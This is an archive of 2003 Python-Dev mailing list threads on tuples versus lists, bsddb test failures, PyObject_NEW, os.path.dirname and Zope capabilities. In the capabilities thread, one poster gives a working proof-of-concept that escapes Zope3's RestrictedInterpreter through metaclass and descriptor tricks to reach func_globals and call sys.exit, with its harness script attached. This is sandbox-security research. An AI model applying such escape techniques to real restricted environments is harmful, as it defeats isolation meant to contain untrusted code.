really matters, I'm sure there aren't any such tests in performance-sensitive 
locations).

Would such an endeavor be useful?  Would a patch to that effect be accepted?

Jeremy


From nas@python.ca  Wed Mar 12 00:05:06 2003
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 11 Mar 2003 16:05:06 -0800
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303111449.42035.fincher.8@osu.edu>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu>
Message-ID: <20030312000505.GA26614@glacier.arctrix.com>

Jeremy Fincher wrote:
> Would such an endeavor be useful?  Would a patch to that effect be accepted?

I doubt it.  It would be more useful to look over the list of open
patches and bugs and find something that you can help on.

  Neil


From guido@python.org  Wed Mar 12 02:11:12 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 11 Mar 2003 21:11:12 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: "Your message of Tue, 11 Mar 2003 14:49:42 EST."
 <200303111449.42035.fincher.8@osu.edu>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
Message-ID: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>

> There are many places in the standard library where some code either
> iterates over a literal list or checks for membership in a literal
> list.  I'm curious if it would be considered productive and useful
> to go through and change those places to iterate over/check for
> membership in literal tuples instead fo lists.  The tuple, I think,
> more closely reflects the read-only literal nature of the code and
> is slightly faster to boot.

-1.

I bet you can't prove the speed-up.

Tuples are for heterogeneous data, list are for homogeneous data.
Tuples are *not* read-only lists.

Tuples require extra care in case the number of elements shrinks to 1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Wed Mar 12 02:15:38 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 11 Mar 2003 21:15:38 -0500
Subject: [Python-Dev] bsddb3 test errors - are these expected?
In-Reply-To: <15982.24855.181016.568236@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHMEAAB.tim.one@comcast.net>

[Skip Montanaro]
> I just tried running regrtest with "-uall,-largefile" (after a "cvs up",
> "./config.status --recheck", and "make") on my Mac OS X system.
> It chugged for awhile, then spit this out several times:
>
>     Exception in thread reader 4:
>     Traceback (most recent call last):
>       File
> "/Users/skip/src/python/head/dist/src/Lib/threading.py", line
> 411, in __bootstrap
>         self.run()
>       File
> "/Users/skip/src/python/head/dist/src/Lib/threading.py", line 399, in run
>         self.__target(*self.__args, **self.__kwargs)
>       File
> "/Users/skip/src/python/head/dist/src/Lib/bsddb/test/test_thread.p
> y", line 270, in reade
>     rThread
>         rec = c.first()
>     DBLockDeadlockError: (-30995, 'DB_LOCK_DEADLOCK: Locker
> killed to resolve a deadlock')
>
> once for each thread,

I believe those are timing-related and harmless.  It would be better if the
test suite suppressed such msgs, if so.

> then this:
>
>     /Users/skip/src/python/head/dist/src/Lib/bsddb/dbutils.py:67:
> RuntimeWarning: DB_INCOMPLETE: Ca
>     che flush was unable to complete
>       return function(*_args, **_kwargs)

That's not good, though.

> After chugging awhile longer, it segfaulted.

Nor that.

> What (if anything) can I do to provide useful inputs to someone who can
> possibly fix the problem?

Sorry, no idea.  Is the pybsddb SF project still open for business?


From tismer@tismer.com  Wed Mar 12 03:39:26 2003
From: tismer@tismer.com (Christian Tismer)
Date: Wed, 12 Mar 2003 04:39:26 +0100
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu> <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6EABEE.2040108@tismer.com>

Guido van Rossum wrote:
...

> Tuples are for heterogeneous data, list are for homogeneous data.
> Tuples are *not* read-only lists.

Oh!

Did you point that out anywhere, before, and I missed it?

Are you thinking of lists as to be really somehow
being homogeneous data, in a sense to be replacible
by some array optimization, sometimes, while tuples aren't?

I never realized this, and I'm a bit stunned.
(but by no means negative about it, just surprized)

ciao - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From fincher.8@osu.edu  Wed Mar 12 01:03:08 2003
From: fincher.8@osu.edu (Jeremy Fincher)
Date: Tue, 11 Mar 2003 20:03:08 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303112003.08689.fincher.8@osu.edu>

On Tuesday 11 March 2003 09:11 pm, Guido van Rossum wrote:
> I bet you can't prove the speed-up.

Here's the script I used to test it:

import timeit

report = \
"""
Size: %s
Tuple Time: %s
List Time: %s
List Time - Tuple Time: %s
"""

if __name__ == '__main__':
    import sys
    if len(sys.argv) > 1:
        upperLimit = sys.argv[1]
    else:
        upperLimit = 10
    for i in xrange(upperLimit):
        lst = range(i)
        tpl = tuple(lst)
        tupleTimer = timeit.Timer('%s in %r' % (upperLimit, tpl))
        listTimer = timeit.Timer('%s in %r' % (upperLimit, lst))
        minTupleTime = min(tupleTimer.repeat())
        minListTime = min(listTimer.repeat())
        difference = minListTime - minTupleTime
        print report % (i, minTupleTime, minListTime, difference)

There seems to be a constant 1.3 usec or so difference between creating a 
tuple and creating a list.  As I mentioned earlier, I seriously doubt it 
would have any significant impact on the overall execution speed of any 
non-trivial Python program, but it exists nonetheless.  Maybe in the realm of 
'low hanging fruit' it's the fruit that's fallen to the ground and begun to 
rot :)

> Tuples are for heterogeneous data, list are for homogeneous data.
> Tuples are *not* read-only lists.

I understand this in a strictly typed language, but in Python, since lists can 
be just as heterogeneous as tuples, it's always seemed to me that the 
greatest difference between lists and tuples is the mutability and 
extensibility of lists.

Jeremy


From Anthony Baxter <anthony@interlink.com.au>  Wed Mar 12 06:35:25 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Wed, 12 Mar 2003 17:35:25 +1100
Subject: [Python-Dev] Audio devices
In-Reply-To: <200303111620.h2BGKJn27187@odiug.zope.com>
Message-ID: <200303120635.h2C6ZP803522@localhost.localdomain>

>>> Guido van Rossum wrote
> The sample is still played at too high a speed, but maybe that's
> expected?

For what it's worth, my redhat 7.3 Dell laptop does this whenever
it gets a mono sample to play. I'm waiting for RH8.1, this will
hopefully fix the problem.

Anthony
-- 
Anthony Baxter     <anthony@interlink.com.au>   
It's never too late to have a happy childhood.


From mal@lemburg.com  Wed Mar 12 09:01:32 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 12 Mar 2003 10:01:32 +0100
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu> <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6EF76C.50608@lemburg.com>

Guido van Rossum wrote:
>>There are many places in the standard library where some code either
>>iterates over a literal list or checks for membership in a literal
>>list.  I'm curious if it would be considered productive and useful
>>to go through and change those places to iterate over/check for
>>membership in literal tuples instead fo lists.  The tuple, I think,
>>more closely reflects the read-only literal nature of the code and
>>is slightly faster to boot.
> 
> 
> -1.
> 
> I bet you can't prove the speed-up.

He probably can :-) That's why I have so many tools in mxTools
which return tuples instead of lists, e.g. trange() and indices().
Both the tuple creation and the iteration are faster than list
creation and access (tuples don't use indirection which saves you a
second malloc() and dereference).

As always: it's the sum of small tweaks like these that makes the
difference in the overall performance of an application.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 12 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     20 days left
EuroPython 2003, Charleroi, Belgium:                       104 days left


From dave@boost-consulting.com  Wed Mar 12 12:24:48 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 07:24:48 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
Message-ID: <uptow93hr.fsf@boost-consulting.com>

Someone I work with recently caused a test to start asserting in VC7's
instrumented free() call, using a pydebug build.  He explained the
change this way:

"I switched from PyObject_New to PyObject_NEW, which according to it's
documentation omits the check for type_object != 0 and consequently
should run a little bit faster"

[he doesn't ever pass 0 as the typeobject]

Did he miss some other important fact about PyObject_NEW? Does the
doc need to be fixed?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Wed Mar 12 12:48:05 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 12 Mar 2003 07:48:05 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: "Your message of Wed, 12 Mar 2003 04:39:26 +0100."
 <3E6EABEE.2040108@tismer.com>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
 <3E6EABEE.2040108@tismer.com>
Message-ID: <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>

> > Tuples are for heterogeneous data, list are for homogeneous data.
> > Tuples are *not* read-only lists.
> 
> Oh!
> 
> Did you point that out anywhere, before, and I missed it?

Yes.  I've been saying this for years whenever people would listen
(which is not often :-( )

> Are you thinking of lists as to be really somehow
> being homogeneous data, in a sense to be replacible
> by some array optimization, sometimes, while tuples aren't?

Python is a dynamic language, and you can do whatever you want with
the data structures it gives you.  But when thinking about extending
the language with optional type declarations or automatic type
inference, I always think of the type of a list as "list of T" while I
think of a tuple's type as "tuple of length N with items of types T1,
T2, T3, ..., TN".  So [1, 2] and [1, 2, 3] are both "list of int" (and
"list of Number" and "list of Object", of course) while ("hello", 42)
is a "2-tuple with items str and int" and (42, "hello", 3.14) is a
"3-tuple with items int, str, float".

> I never realized this, and I'm a bit stunned.
> (but by no means negative about it, just surprized)

You learn something new every day. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Wed Mar 12 12:54:55 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 12 Mar 2003 07:54:55 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: "Your message of Tue, 11 Mar 2003 20:03:08 EST."
 <200303112003.08689.fincher.8@osu.edu>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
 <200303112003.08689.fincher.8@osu.edu>
Message-ID: <200303121254.h2CCstj29915@pcp02138704pcs.reston01.va.comcast.net>

> On Tuesday 11 March 2003 09:11 pm, Guido van Rossum wrote:
> > I bet you can't prove the speed-up.
> 
> Here's the script I used to test it:

[Good use of 'timeit' module skipped]

> There seems to be a constant 1.3 usec or so difference between
> creating a tuple and creating a list.  As I mentioned earlier, I
> seriously doubt it would have any significant impact on the overall
> execution speed of any non-trivial Python program, but it exists
> nonetheless.  Maybe in the realm of 'low hanging fruit' it's the
> fruit that's fallen to the ground and begun to rot :)

Of course creating a tuple is faster than creating a list.  I meant
that you wouldn't be able to show a speed difference in any of the
places where you would consider adding it (i.e. in context).

> > Tuples are for heterogeneous data, list are for homogeneous data.
> > Tuples are *not* read-only lists.
> 
> I understand this in a strictly typed language, but in Python, since
> lists can be just as heterogeneous as tuples, it's always seemed to
> me that the greatest difference between lists and tuples is the
> mutability and extensibility of lists.

Sorry, you're wrong.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed Mar 12 12:57:25 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 12 Mar 2003 13:57:25 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uptow93hr.fsf@boost-consulting.com>
References: <uptow93hr.fsf@boost-consulting.com>
Message-ID: <3E6F2EB5.5020207@lemburg.com>

David Abrahams wrote:
> Someone I work with recently caused a test to start asserting in VC7's
> instrumented free() call, using a pydebug build.  He explained the
> change this way:
> 
> "I switched from PyObject_New to PyObject_NEW, which according to it's
> documentation omits the check for type_object != 0 and consequently
> should run a little bit faster"
> 
> [he doesn't ever pass 0 as the typeobject]
> 
> Did he miss some other important fact about PyObject_NEW? Does the
> doc need to be fixed?

Does he use PyObject_DEL() to free the object ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 12 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     20 days left
EuroPython 2003, Charleroi, Belgium:                       104 days left


From guido@python.org  Wed Mar 12 13:08:20 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 12 Mar 2003 08:08:20 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: "Your message of Wed, 12 Mar 2003 07:24:48 EST."
 <uptow93hr.fsf@boost-consulting.com>
References: <uptow93hr.fsf@boost-consulting.com>
Message-ID: <200303121308.h2CD8Kj29996@pcp02138704pcs.reston01.va.comcast.net>

> Someone I work with recently caused a test to start asserting in VC7's
> instrumented free() call, using a pydebug build.  He explained the
> change this way:
> 
> "I switched from PyObject_New to PyObject_NEW, which according to it's
> documentation omits the check for type_object != 0 and consequently
> should run a little bit faster"
> 
> [he doesn't ever pass 0 as the typeobject]
> 
> Did he miss some other important fact about PyObject_NEW? Does the
> doc need to be fixed?

You can read the source code as well as I can.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ark@research.att.com  Wed Mar 12 14:06:10 2003
From: ark@research.att.com (Andrew Koenig)
Date: 12 Mar 2003 09:06:10 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
 <3E6EABEE.2040108@tismer.com>
 <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <yu998yvkadd9.fsf@europa.research.att.com>

Guido> Python is a dynamic language, and you can do whatever you want
Guido> with the data structures it gives you.  But when thinking about
Guido> extending the language with optional type declarations or
Guido> automatic type inference, I always think of the type of a list
Guido> as "list of T" while I think of a tuple's type as "tuple of
Guido> length N with items of types T1, T2, T3, ..., TN".  So [1, 2]
Guido> and [1, 2, 3] are both "list of int" (and "list of Number" and
Guido> "list of Object", of course) while ("hello", 42) is a "2-tuple
Guido> with items str and int" and (42, "hello", 3.14) is a "3-tuple
Guido> with items int, str, float".

It might interest you to know that Standard ML, which is statically
but polymorphically typed, draws exactly that distinction.  It has
both tuple and list types.  The type of a tuple includes the type of
each of its elements, whereas all of the elements of a list must be
the same type.  Moreover, although the type of a list includes the
type of its elements, it does not include how many elements there are.

So in ML, the type of [1, 2, 3] is "int list", and the type of
("hello", 42) is "string * int".

-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From barry@python.org  Wed Mar 12 14:23:29 2003
From: barry@python.org (Barry A. Warsaw)
Date: Wed, 12 Mar 2003 09:23:29 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
 <3E6EABEE.2040108@tismer.com>
 <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <15983.17121.164482.184532@gargle.gargle.HOWL>

>>>>> "GvR" == Guido van Rossum <guido@python.org> writes:

    GvR> I always think of the type of a list as "list of T" while I
    GvR> think of a tuple's type as "tuple of length N with items of
    GvR> types T1, T2, T3, ..., TN".  So [1, 2] and [1, 2, 3] are both
    GvR> "list of int" (and "list of Number" and "list of Object", of
    GvR> course) while ("hello", 42) is a "2-tuple with items str and
    GvR> int" and (42, "hello", 3.14) is a "3-tuple with items int,
    GvR> str, float".

Of course (1, 2, 3) fits under that description, where, just by chance
<wink> T1 == T2 == T3.

But one of the ways I think about it is the tuple's relationship to
argument and return passing.  It's the tuple that's used when multiple
values are returned from a function and they are almost always
heterogeneous.  And while lists can be used for unpacking sequences, I
tend to think of tuples when I want record types, e.g.

    rec = magic(blah)
    length, prefix, interface = rec

-Barry


From tismer@tismer.com  Wed Mar 12 14:46:55 2003
From: tismer@tismer.com (Christian Tismer)
Date: Wed, 12 Mar 2003 15:46:55 +0100
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu> <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net> <3E6EABEE.2040108@tismer.com> <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6F485F.3030104@tismer.com>

Guido van Rossum wrote:
> Tuples are for heterogeneous data, list are for homogeneous data.
> Tuples are *not* read-only lists.
> 
> Oh!
> 
> Did you point that out anywhere, before, and I missed it?
> 
> Yes.  I've been saying this for years whenever people would listen
> (which is not often :-( )

Sorry.

>>Are you thinking of lists as to be really somehow
>>being homogeneous data, in a sense to be replacible
>>by some array optimization, sometimes, while tuples aren't?
> 
> 
> Python is a dynamic language, and you can do whatever you want with
> the data structures it gives you.  But when thinking about extending
> the language with optional type declarations or automatic type
> inference, I always think of the type of a list as "list of T" while I
> think of a tuple's type as "tuple of length N with items of types T1,
> T2, T3, ..., TN".  So [1, 2] and [1, 2, 3] are both "list of int" (and
> "list of Number" and "list of Object", of course) while ("hello", 42)
> is a "2-tuple with items str and int" and (42, "hello", 3.14) is a
> "3-tuple with items int, str, float".

Oh yes, after re-thinking this, my question was
dumb. From my own usage of tuples and lists,
I know that I almost always use lists as collections
of objects of the same type, while tuples are often
used to group different things together.

Basically, I knew this all, and I'm asking
myself why I asked. Probably since I'm looking
at lists and tuples too much technically, these days.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From pedronis@bluewin.ch  Wed Mar 12 16:25:58 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Wed, 12 Mar 2003 17:25:58 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico> <3E6C7C3A.2090104@zope.com> <008001c2e70f$f514c520$6d94fea9@newmexico>
Message-ID: <007a01c2e8b4$1092ab00$6d94fea9@newmexico>

This is a multi-part message in MIME format.

------=_NextPart_000_0077_01C2E8BC.71D0CC00
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

I posted

> <s.py>
[...]
>
> class MyExc(Exception): # !!! definition outside of resticted execution
>   def __init__(self,msg):
>     self.message = msg
>     Exception.__init__(self,msg)
>
>   def __str__(self):
>     return self.message
>
> def myfunc():
>   raise MyExc('foo')
>
> ri = RestrictedInterpreter()
>
> ri.globals['myfunc'] = ProxyFactory(myfunc)
>
> f = open('c:/Documenti/x.txt','r')
> code = f.read()
> f.close()
>
> ri.ri_exec(code)
>
> print "OK"
> </s.py>
>
> Anyway I have a _very baroque_ x.txt that  manages to call sys.exit.
>

attached is a modified version of s.py that takes a filename for the code to
run inside the RestrictedInterpreter. Also myfunc is now myexc_source . There
is also a new function candy, next mail on that.

Here is a run with xpl1 (was x.txt):

...>\usr\python22\python -i s.py xpl1
restricted execution
no exit
cannot access sys.exit directly
Got sys.exit

...>

no OK, no  Python prompt !

here is xpl1 code [warning: metaclasses, descriptors usage, functional
programming ahead :)]
[some things are artifacts of the non-deliberate limitations inside
RestrictedInterpreter]

#Object = ''.__class__.__base__
Type = ''.__class__.__class__

class Iter:
  __metaclass__ = Type
  def __init__(self,v):
    self.v = v
    self.i = 0
  def __iter__(self): return self
  def next(self):
    try:
      v = self.v[self.i]
      self.i += 1
      return v
    except IndexError:
      raise StopIteration

class consta:
  __metaclass__ = Type

  def __init__(self,o):
    self.o = o

  def __get__(self,obj,typ): return self.o

#

try:
  myexc_source()
except Exception,e:
  pass

MyExc = e.__class__
e__str__ = e.__str__

#

try:
  e__str__.func_globals
except:
  print "restricted execution"

try:
  exit(0)
except:
  print "no exit"

try:
  import sys
  sys.exit(0)
except:
  print "cannot access sys.exit directly"

#

class Y:
  class __metaclass__(Type):
    def __iter__(cls): return Iter(['func_globals'])

class X(Y,MyExc):

  message = None

  __call__ = consta(getattr)
  def __iter__(self): return Iter([e__str__])

  #def __get__(self,x,X):
  #  print self,x,y
  #  return map(self,x,X)

  __get__ = map

# x isinst MyExc
# x.message === x.__get__(x,X) === map(x,x,X)
# x(o,a) === getattr(o,a)
# map(None,x) === [e__str__]
# map(None,X) === ['func_globals']

x=X()
X.message = x

g = MyExc.__str__(x)

print "Got sys.exit"
g[0]['exit'](0)

------=_NextPart_000_0077_01C2E8BC.71D0CC00
Content-Type: text/plain;
	name="s.py"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="s.py"

import sys

from os.path import join as pathjoin,dirname

code_fname =3D pathjoin(dirname(sys.argv[0]),sys.argv[1])

from sys import exit # !!! same module as MyExc

sys.path.append('C:/transit/Zope3-3.0a1/src') # ! add Zope3 (alpha) to =
sys.path

from zope.security.interpreter import RestrictedInterpreter
from zope.security.checker import ProxyFactory

class MyExc(Exception): # !!! definition outside of resticted execution
  def __init__(self,msg):
    self.message =3D msg
    Exception.__init__(self,msg)

  def __str__(self):
    return self.message

def myexc_source():
  raise MyExc('foo')

def candy(s):
  if s =3D=3D "yes":
    return 'candy'
  else:
    return 'none'

ri =3D RestrictedInterpreter()

ri.globals['myexc_source'] =3D ProxyFactory(myexc_source)

ri.globals['candy'] =3D ProxyFactory(candy)

f =3D open(code_fname,'r')
code =3D f.read()
f.close()

ri.ri_exec(code)

print "OK"
------=_NextPart_000_0077_01C2E8BC.71D0CC00--


From ben@algroup.co.uk  Wed Mar 12 16:24:40 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Wed, 12 Mar 2003 16:24:40 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <E18sUcB-0003SH-00@localhost>
References: <E18s06J-0006ZD-00@localhost>  <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net> <E18sUcB-0003SH-00@localhost>
Message-ID: <3E6F5F48.7040001@algroup.co.uk>

Zooko wrote:
> I suspect that capabilities are quite similar to Zope proxies.

If I understand them correctly, a Zope proxy where the security checker 
always says "yes" is a capability. Except, possibly, they may be 
forgeable, I don't know them well enough to know.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From altis@semi-retired.com  Wed Mar 12 16:43:04 2003
From: altis@semi-retired.com (Kevin Altis)
Date: Wed, 12 Mar 2003 08:43:04 -0800
Subject: [Python-Dev] os.path.dirname misleading?
Message-ID: <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>

I'm not sure whether to classify this as a bug or a feature request.
Recently, I got burned by the fact that despite the name, dirname() does not
return the expected directory portion of a path if you pass it a directory,
instead it will return the parent directory because it uses split.

That it uses split is clearly documented and also evident in the source,
though both fail to point out the case of passing in a directory path.

"dirname(path)
Return the directory name of pathname path. This is the first half of the
pair returned by split(path)."

# Return the head (dirname) part of a path.

def dirname(p):
    """Returns the directory component of a pathname"""
    return split(p)[0]

However, to get what I would consider correct behavior based on the function
name, the code would need to be:

def dirname(p):
    """Returns the directory component of a pathname"""
    if isdir(p):
        return p
    else:
        return split(p)[0]

Changing dirname() may in fact break existing code if people expect it to
just use split, so a dirname2() function seems called for, but that seems
silly, given that dirname should probably be doing an isdir() check.

ka


From aahz@pythoncraft.com  Wed Mar 12 16:48:58 2003
From: aahz@pythoncraft.com (Aahz)
Date: Wed, 12 Mar 2003 11:48:58 -0500
Subject: [Python-Dev] Tuples vs lists
In-Reply-To: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu> <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030312164858.GA16021@panix.com>

On Tue, Mar 11, 2003, Guido van Rossum wrote:
>
> Tuples are for heterogeneous data, list are for homogeneous data.
> Tuples are *not* read-only lists.

It's been on my To-Do list to update PEP 8 since last June; if someone
else wants to do it, be my guest.  ;-)
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From skip@pobox.com  Wed Mar 12 16:54:57 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 12 Mar 2003 10:54:57 -0600
Subject: [Python-Dev] os.path.dirname misleading?
In-Reply-To: <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>
References: <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>
Message-ID: <15983.26209.303521.418616@montanaro.dyndns.org>

    Kevin> However, to get what I would consider correct behavior based on
    Kevin> the function name, the code would need to be:

    Kevin> def dirname(p):
    Kevin>     """Returns the directory component of a pathname"""
    Kevin>     if isdir(p):
    Kevin>         return p
    Kevin>     else:
    Kevin>         return split(p)[0]

No can do.  On my Mac I could execute:

    >>> import ntpath
    >>> print ntpath.dirname("C:\\system\\win32")
    C:\system

Calling isdir() is not an option.

Taken another way, "/usr/bin" is a path to a file, so "/usr" is its
directory component.  and "bin" is its basename:

    >>> os.path.dirname("/usr/bin")
    '/usr'
    >>> os.path.basename("/usr/bin")
    'bin'

That "/usr/bin" happens to also be a directory is beside the point.

Skip


From guido@python.org  Wed Mar 12 17:04:38 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 12 Mar 2003 12:04:38 -0500
Subject: [Python-Dev] os.path.dirname misleading?
In-Reply-To: Your message of "Wed, 12 Mar 2003 08:43:04 PST."
 <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>
References: <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>
Message-ID: <200303121704.h2CH4jn00404@odiug.zope.com>

> I'm not sure whether to classify this as a bug or a feature request.
> Recently, I got burned by the fact that despite the name, dirname()
> does not return the expected directory portion of a path if you pass
> it a directory, instead it will return the parent directory because
> it uses split.

This is the first time I've ever heard of this confusion.  dirname is
named after the Unix shell function of the same name, which behaves
the same way.

I'm not even sure I understand what you expected -- you expected
dirname("foo") to return "foo" if foo is a directory?  What would be
the point of that?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Wed Mar 12 17:15:21 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 12 Mar 2003 12:15:21 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <200303121308.h2CD8Kj29996@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEELDEAAB.tim.one@comcast.net>

[David Abrahams]
> Someone I work with recently caused a test to start asserting in VC7's
> instrumented free() call, using a pydebug build.  He explained the
> change this way:
>
> "I switched from PyObject_New to PyObject_NEW, which according to it's
> documentation omits the check for type_object != 0 and consequently
> should run a little bit faster"
>
> [he doesn't ever pass 0 as the typeobject]

> Did he miss some other important fact about PyObject_NEW? Does the
> doc need to be fixed?

[Guido]
> You can read the source code as well as I can.

Possibly, but not as well as I can <wink> -- the memory API's implementation
is monumentally convoluted, especially before 2.3.  Speaking of which,
David, which version of Python was "someone" using?  Did they enable
pymalloc?  Did they give you a traceback (showing from where free() was
called)?  Was it even freeing a Python object at the time?  In what code
base did someone make this substitution (e.g., Python core, Boost sources,
someone's own extension module, someone else's extension module)?

The straight answer to your question is no.  A nastier answer is that many
memory mgmt screwups are shy, and can be triggered by seemingly irrelevant
changes.


From altis@semi-retired.com  Wed Mar 12 17:45:15 2003
From: altis@semi-retired.com (Kevin Altis)
Date: Wed, 12 Mar 2003 09:45:15 -0800
Subject: [Python-Dev] os.path.dirname misleading?
